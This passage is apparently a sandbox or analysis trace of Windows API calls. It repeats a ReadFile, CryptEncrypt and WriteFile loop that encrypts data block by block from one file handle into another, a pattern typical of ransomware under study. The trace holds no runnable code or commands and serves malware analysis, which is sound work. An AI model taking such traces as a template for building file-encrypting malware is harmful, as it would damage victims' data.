pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.883] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.886] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.887] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.887] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.888] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.888] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.888] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.888] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.888] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.888] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.888] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.888] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.888] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.888] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.888] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.888] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.889] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.889] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.889] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.889] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.889] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.889] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.889] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.889] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.889] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.889] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.889] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.889] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.890] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.890] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.890] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.890] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.890] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.890] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.890] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.890] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.890] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.890] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.891] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.891] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.891] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.891] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.891] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.891] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.891] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.891] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.891] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.891] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.891] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.891] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.892] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.892] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.892] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.892] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.892] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.892] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.892] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.892] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.892] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.892] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.892] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.892] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.893] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.893] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.893] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.893] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.893] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.893] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.893] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.893] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.893] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.893] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.893] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.893] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.893] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.894] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.894] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.894] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.894] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.894] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.894] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.894] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.894] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.894] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.894] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.894] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.894] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.894] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.894] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.895] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.895] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.895] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.895] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.895] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.895] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.895] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.895] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: 